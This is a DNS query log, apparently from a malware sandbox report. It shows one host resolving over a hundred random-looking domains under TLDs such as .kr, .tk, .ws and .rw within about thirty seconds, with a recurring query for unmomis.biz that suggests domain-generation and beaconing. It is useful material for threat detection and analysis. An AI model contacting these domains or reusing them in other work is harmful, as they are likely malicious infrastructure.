                                                                                                                                                                    Sep 7, 2024 15:36:01.494579077 CEST192.168.2.121.1.1.10x9940Standard query (0)huvzylm.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:01.618820906 CEST192.168.2.121.1.1.10x5379Standard query (0)oimceoqaiyvn.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:01.963253021 CEST192.168.2.121.1.1.10x9636Standard query (0)vrjtoa.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:02.103390932 CEST192.168.2.121.1.1.10x39ecStandard query (0)uwelyacxsoawk.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:02.369342089 CEST192.168.2.121.1.1.10xe70dStandard query (0)yokgfouswma.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:02.478142977 CEST192.168.2.121.1.1.10x7c59Standard query (0)lmnqodgecika.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:02.605041981 CEST192.168.2.121.1.1.10xed3eStandard query (0)yvkykeqbywnf.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:02.731384039 CEST192.168.2.121.1.1.10x3eeaStandard query (0)sewieka.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:02.838296890 CEST192.168.2.121.1.1.10xde90Standard query (0)aimnj.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:02.947529078 CEST192.168.2.121.1.1.10xcd5eStandard query (0)vzwhonaamf.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:03.041330099 CEST192.168.2.121.1.1.10x6efaStandard query (0)yeimksoeioovgr.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:03.290534019 CEST192.168.2.121.1.1.10x6efaStandard query (0)yeimksoeioovgr.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:03.469635010 CEST192.168.2.121.1.1.10xd7beStandard query (0)dmmmsqxmm.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:03.587584972 CEST192.168.2.121.1.1.10xd4f1Standard query (0)yukqyeyeauqpy.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:03.696913958 CEST192.168.2.121.1.1.10x2238Standard query (0)ewecy.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:03.806268930 CEST192.168.2.121.1.1.10x1f7fStandard query (0)rioyquosq.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:03.931376934 CEST192.168.2.121.1.1.10xb8aeStandard query (0)ixyogaqmz.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:04.072208881 CEST192.168.2.121.1.1.10xa504Standard query (0)wbtyq.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:04.181328058 CEST192.168.2.121.1.1.10xf39dStandard query (0)qfuqsaahhga.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:04.290735006 CEST192.168.2.121.1.1.10x8b39Standard query (0)crwsj.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:04.558609962 CEST192.168.2.121.1.1.10x8b39Standard query (0)crwsj.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:04.888252020 CEST192.168.2.121.1.1.10xca62Standard query (0)smfaaljqenlwu.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:04.994599104 CEST192.168.2.121.1.1.10x5475Standard query (0)daoiyti.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:05.118722916 CEST192.168.2.121.1.1.10xc2ceStandard query (0)euiyqou.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:05.244666100 CEST192.168.2.121.1.1.10xcb17Standard query (0)ykwmbwaahgx.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:05.513262033 CEST192.168.2.121.1.1.10xb9b6Standard query (0)earweqw.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:05.618994951 CEST192.168.2.121.1.1.10x9b93Standard query (0)vllttyuji.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:05.884439945 CEST192.168.2.121.1.1.10x1cafStandard query (0)ilgsxg.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:06.150609970 CEST192.168.2.121.1.1.10x9798Standard query (0)ojykg.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:06.181210995 CEST192.168.2.121.1.1.10x28acStandard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:06.274976015 CEST192.168.2.121.1.1.10x5e4aStandard query (0)ifoyxx.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:06.541208029 CEST192.168.2.121.1.1.10x3bbcStandard query (0)xegza.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:06.635210991 CEST192.168.2.121.1.1.10xaaf6Standard query (0)oqedqmaaasm.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:06.743679047 CEST192.168.2.121.1.1.10x6215Standard query (0)lkudjcmgi.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:06.853805065 CEST192.168.2.121.1.1.10xee3fStandard query (0)vgipoi.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:06.962532043 CEST192.168.2.121.1.1.10x5242Standard query (0)cjwcp.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:07.056202888 CEST192.168.2.121.1.1.10xc142Standard query (0)opsemiovjkw.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:07.183248997 CEST192.168.2.121.1.1.10xc7b0Standard query (0)hwithlztp.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:07.278106928 CEST192.168.2.121.1.1.10x7a04Standard query (0)aynju.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:07.384427071 CEST192.168.2.121.1.1.10xed1aStandard query (0)bqzsz.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:07.712796926 CEST192.168.2.121.1.1.10x9b0Standard query (0)bksqmoemyawxs.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:07.821871042 CEST192.168.2.121.1.1.10xa493Standard query (0)sobwiume.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:07.916085005 CEST192.168.2.121.1.1.10x3e9eStandard query (0)fqjkmirumioyu.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:08.009385109 CEST192.168.2.121.1.1.10xbfc4Standard query (0)qikzysqfz.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:08.103487015 CEST192.168.2.121.1.1.10x1c4cStandard query (0)qpqqbqlxrg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:08.260759115 CEST192.168.2.121.1.1.10xf952Standard query (0)sdcwyqe.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:08.525111914 CEST192.168.2.121.1.1.10x668dStandard query (0)jpkkoysg.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:08.790656090 CEST192.168.2.121.1.1.10x3d03Standard query (0)giacuxfzu.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:08.900449991 CEST192.168.2.121.1.1.10x81eaStandard query (0)ctlfybw.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:09.009368896 CEST192.168.2.121.1.1.10x540Standard query (0)jmwqo.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:09.260302067 CEST192.168.2.121.1.1.10x3d31Standard query (0)eicksugosskag.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:09.447712898 CEST192.168.2.121.1.1.10xb985Standard query (0)ukzyikviofoas.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:09.556279898 CEST192.168.2.121.1.1.10x3b31Standard query (0)zebrkabdqmc.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:09.695828915 CEST192.168.2.121.1.1.10x587dStandard query (0)yqqvkiancwh.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:09.806374073 CEST192.168.2.121.1.1.10x8e55Standard query (0)iwksrbacke.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:10.055910110 CEST192.168.2.121.1.1.10x8e55Standard query (0)iwksrbacke.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:10.384955883 CEST192.168.2.121.1.1.10x2b1cStandard query (0)ksggcecmcssoky.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:10.493974924 CEST192.168.2.121.1.1.10x9891Standard query (0)inedvrw.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:10.743716002 CEST192.168.2.121.1.1.10x74f6Standard query (0)zqijgyf.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:10.994261026 CEST192.168.2.121.1.1.10xff10Standard query (0)chqkltc.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:11.306272984 CEST192.168.2.121.1.1.10xbb4bStandard query (0)aoqszguyaujek.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:11.494333029 CEST192.168.2.121.1.1.10xdaafStandard query (0)tcniociet.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:11.603713989 CEST192.168.2.121.1.1.10x1cc5Standard query (0)csqqvsw.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:11.868696928 CEST192.168.2.121.1.1.10x1cc5Standard query (0)csqqvsw.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:12.009428024 CEST192.168.2.121.1.1.10xbd03Standard query (0)seovkg.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:12.103785038 CEST192.168.2.121.1.1.10x53edStandard query (0)dpildsyvcpme.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:12.118827105 CEST192.168.2.121.1.1.10xbd05Standard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:12.212485075 CEST192.168.2.121.1.1.10x160eStandard query (0)iukvug.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:12.477757931 CEST192.168.2.121.1.1.10x160eStandard query (0)iukvug.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:13.134972095 CEST192.168.2.121.1.1.10x811fStandard query (0)nvlmkgbaaikde.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:13.384390116 CEST192.168.2.121.1.1.10x811fStandard query (0)nvlmkgbaaikde.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:13.493702888 CEST192.168.2.121.1.1.10x3efStandard query (0)qoleadbyspbu.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:13.588057995 CEST192.168.2.121.1.1.10x73edStandard query (0)scmcweq.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:13.697391987 CEST192.168.2.121.1.1.10x11e6Standard query (0)eacpwc.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:13.790735006 CEST192.168.2.121.1.1.10x55eStandard query (0)akkwuuasmqs.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:13.885973930 CEST192.168.2.121.1.1.10x2bfdStandard query (0)scfeewomj.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:13.998162985 CEST192.168.2.121.1.1.10x671aStandard query (0)uqiheoqaqgoe.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:14.118912935 CEST192.168.2.121.1.1.10x3675Standard query (0)kugwdohdildom.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:14.368367910 CEST192.168.2.121.1.1.10x3675Standard query (0)kugwdohdildom.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:14.603147030 CEST192.168.2.121.1.1.10x7a55Standard query (0)qnscmsp.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:14.869343042 CEST192.168.2.121.1.1.10x4facStandard query (0)seeudywghcoce.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:15.040564060 CEST192.168.2.121.1.1.10xf22cStandard query (0)wmbglyuglyui.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:15.134388924 CEST192.168.2.121.1.1.10x901dStandard query (0)wwwtmlycixa.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:15.243676901 CEST192.168.2.121.1.1.10xc2e1Standard query (0)mwscuidsbxwd.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:15.556754112 CEST192.168.2.121.1.1.10xdba1Standard query (0)osoisssdicto.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:15.649960041 CEST192.168.2.121.1.1.10xd382Standard query (0)xbwkbyiqiweyg.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:15.978662968 CEST192.168.2.121.1.1.10x526bStandard query (0)wcwmvlwgg.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:16.227972984 CEST192.168.2.121.1.1.10x526bStandard query (0)wcwmvlwgg.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:16.744456053 CEST192.168.2.121.1.1.10xaefbStandard query (0)beugefkah.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:16.993412018 CEST192.168.2.121.1.1.10xaefbStandard query (0)beugefkah.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:17.308535099 CEST192.168.2.121.1.1.10xa00aStandard query (0)ckkwm.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:17.399981022 CEST192.168.2.121.1.1.10x8264Standard query (0)ogehari.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:17.431250095 CEST192.168.2.121.1.1.10xfb14Standard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:17.509391069 CEST192.168.2.121.1.1.10x477eStandard query (0)iestfjbodxvgi.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:17.822696924 CEST192.168.2.121.1.1.10x373fStandard query (0)wvhskhuictuc.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:17.932441950 CEST192.168.2.121.1.1.10xb74dStandard query (0)ygszuq.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:18.025389910 CEST192.168.2.121.1.1.10x5eb0Standard query (0)gctciuk.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:18.275021076 CEST192.168.2.121.1.1.10x5eb0Standard query (0)gctciuk.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:19.198615074 CEST192.168.2.121.1.1.10xc5f4Standard query (0)orksc.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:19.446696043 CEST192.168.2.121.1.1.10xc5f4Standard query (0)orksc.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:19.952105999 CEST192.168.2.121.1.1.10x9a73Standard query (0)lwiqiuyoegm.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:20.040597916 CEST192.168.2.121.1.1.10x743eStandard query (0)uzhqapkl.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:20.165782928 CEST192.168.2.121.1.1.10xaf56Standard query (0)uwuxiskxiq.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:20.246988058 CEST192.168.2.121.1.1.10xce8Standard query (0)bqwwrss.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:20.353751898 CEST192.168.2.121.1.1.10x1706Standard query (0)tykiwmfgw.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:20.462595940 CEST192.168.2.121.1.1.10x4491Standard query (0)ahyfgoa.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:20.806397915 CEST192.168.2.121.1.1.10xeaa5Standard query (0)gctmzo.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:21.056251049 CEST192.168.2.121.1.1.10x68e1Standard query (0)yrkaidc.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:21.337691069 CEST192.168.2.121.1.1.10x3e3aStandard query (0)zkbftoqb.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:21.450294018 CEST192.168.2.121.1.1.10xc846Standard query (0)mqrcyvcvqnw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:21.619009972 CEST192.168.2.121.1.1.10xe8edStandard query (0)ssspbgxeq.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:21.775290012 CEST192.168.2.121.1.1.10x7713Standard query (0)gwrie.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:21.853238106 CEST192.168.2.121.1.1.10x4954Standard query (0)aojuv.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:21.931252003 CEST192.168.2.121.1.1.10xbef9Standard query (0)iyygkpmmmemtm.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:22.009416103 CEST192.168.2.121.1.1.10x5c39Standard query (0)czgvgqx.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:22.262403965 CEST192.168.2.121.1.1.10x7a9fStandard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:22.340429068 CEST192.168.2.121.1.1.10x70cStandard query (0)cgtgpeqgmorej.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:22.498281002 CEST192.168.2.121.1.1.10x7597Standard query (0)unieemichmmsj.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:22.744339943 CEST192.168.2.121.1.1.10x672bStandard query (0)uqeqghuugsvu.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:23.056756020 CEST192.168.2.121.1.1.10x811eStandard query (0)wsuyqlekgeeca.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:23.151118040 CEST192.168.2.121.1.1.10xebf9Standard query (0)sajnkysa.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:23.401840925 CEST192.168.2.121.1.1.10xe51aStandard query (0)csvcjuq.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:23.509367943 CEST192.168.2.121.1.1.10x3cc5Standard query (0)ojajroucusd.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:23.603286982 CEST192.168.2.121.1.1.10x5fc4Standard query (0)trdaizzmc.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:23.697227955 CEST192.168.2.121.1.1.10xfb1fStandard query (0)sohwyrbeieo.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:23.790685892 CEST192.168.2.121.1.1.10x5588Standard query (0)islepegwe.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:23.884392023 CEST192.168.2.121.1.1.10x8931Standard query (0)egvcu.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:24.152789116 CEST192.168.2.121.1.1.10x8931Standard query (0)egvcu.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:24.399966002 CEST192.168.2.121.1.1.10x3f7eStandard query (0)smvzi.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:24.493973970 CEST192.168.2.121.1.1.10x2b85Standard query (0)fgssdjwvyfa.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:24.758936882 CEST192.168.2.121.1.1.10x2b85Standard query (0)fgssdjwvyfa.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:24.837848902 CEST192.168.2.121.1.1.10x2083Standard query (0)dgyamloeotg.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:24.915621042 CEST192.168.2.121.1.1.10xeabStandard query (0)eiogsskssi.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:25.165211916 CEST192.168.2.121.1.1.10xeabStandard query (0)eiogsskssi.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:25.243735075 CEST192.168.2.121.1.1.10x60efStandard query (0)cisdtlhkuus.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:25.337680101 CEST192.168.2.121.1.1.10x72a9Standard query (0)ftswcv.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:25.509643078 CEST192.168.2.121.1.1.10x6fa3Standard query (0)uwwzrssqijm.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:25.761424065 CEST192.168.2.121.1.1.10x6fa3Standard query (0)uwwzrssqijm.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:26.127012968 CEST192.168.2.121.1.1.10x3ce5Standard query (0)wqricahmuvyywk.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:26.259831905 CEST192.168.2.121.1.1.10x2adbStandard query (0)uibsoakcfqkeuk.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:26.353399038 CEST192.168.2.121.1.1.10xa76dStandard query (0)hgeticnca.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:26.478166103 CEST192.168.2.121.1.1.10x945fStandard query (0)jkoxgki.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:26.712523937 CEST192.168.2.121.1.1.10x78e1Standard query (0)resmiwgzvok.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:26.947166920 CEST192.168.2.121.1.1.10x8d23Standard query (0)lasrcqyfvt.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:27.197351933 CEST192.168.2.121.1.1.10x8d23Standard query (0)lasrcqyfvt.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:27.744379997 CEST192.168.2.121.1.1.10x51aaStandard query (0)ivygbfoqj.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:27.821902990 CEST192.168.2.121.1.1.10xdc5fStandard query (0)zasoo.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:27.838037014 CEST192.168.2.121.1.1.10x8291Standard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:27.915749073 CEST192.168.2.121.1.1.10x64c4Standard query (0)rpdsusinbkip.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:28.181704998 CEST192.168.2.121.1.1.10x64c4Standard query (0)rpdsusinbkip.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:28.510374069 CEST192.168.2.121.1.1.10x9177Standard query (0)qsopmlomcio.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:28.603360891 CEST192.168.2.121.1.1.10xc41dStandard query (0)fwqgtgjyw.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:28.697231054 CEST192.168.2.121.1.1.10x7d56Standard query (0)wokyuems.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:28.935172081 CEST192.168.2.121.1.1.10x7ccStandard query (0)hxcnq.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:29.025347948 CEST192.168.2.121.1.1.10x840bStandard query (0)coakgoyyo.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:29.259438038 CEST192.168.2.121.1.1.10x3d64Standard query (0)vjqauy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:29.385051012 CEST192.168.2.121.1.1.10xdf8fStandard query (0)uacytqutog.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:29.634484053 CEST192.168.2.121.1.1.10xdf6fStandard query (0)oqueq.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:29.712476015 CEST192.168.2.121.1.1.10xf156Standard query (0)guagbcg.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:29.790894985 CEST192.168.2.121.1.1.10x5a28Standard query (0)ckgewowedw.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:29.868752003 CEST192.168.2.121.1.1.10x5182Standard query (0)rtahzausd.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:29.946959019 CEST192.168.2.121.1.1.10xcd27Standard query (0)ekraibudt.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:30.571965933 CEST192.168.2.121.1.1.10xb38aStandard query (0)ysgeqagipxhjh.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:30.882702112 CEST192.168.2.121.1.1.10xefbbStandard query (0)ibkxqgyeoopjy.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:30.978600979 CEST192.168.2.121.1.1.10xb145Standard query (0)yehyukn.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:31.088689089 CEST192.168.2.121.1.1.10x58bbStandard query (0)cfrwnksgi.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:31.181476116 CEST192.168.2.121.1.1.10x1dcdStandard query (0)tteeysooaqybyz.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:31.260333061 CEST192.168.2.121.1.1.10x4a64Standard query (0)qwuikiryt.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:31.355392933 CEST192.168.2.121.1.1.10xc36cStandard query (0)srkkd.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:31.431255102 CEST192.168.2.121.1.1.10x7b46Standard query (0)qgqdcwm.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:31.509633064 CEST192.168.2.121.1.1.10x3423Standard query (0)ieuqijsvy.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:31.603225946 CEST192.168.2.121.1.1.10x2ef9Standard query (0)ekejl.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:31.852842093 CEST192.168.2.121.1.1.10x2ef9Standard query (0)ekejl.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:31.947993040 CEST192.168.2.121.1.1.10xf2b1Standard query (0)gpqmiqxcsgq.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:32.197084904 CEST192.168.2.121.1.1.10x757cStandard query (0)spcakqsti.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:32.354271889 CEST192.168.2.121.1.1.10x2ddStandard query (0)eskgkmsahbgx.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:32.619091988 CEST192.168.2.121.1.1.10x2ddStandard query (0)eskgkmsahbgx.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:32.777771950 CEST192.168.2.121.1.1.10x69f5Standard query (0)aoyuutyfowm.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:33.030886889 CEST192.168.2.121.1.1.10x372eStandard query (0)swgegyqvcituc.cgA (IP address)IN (0x0001)false
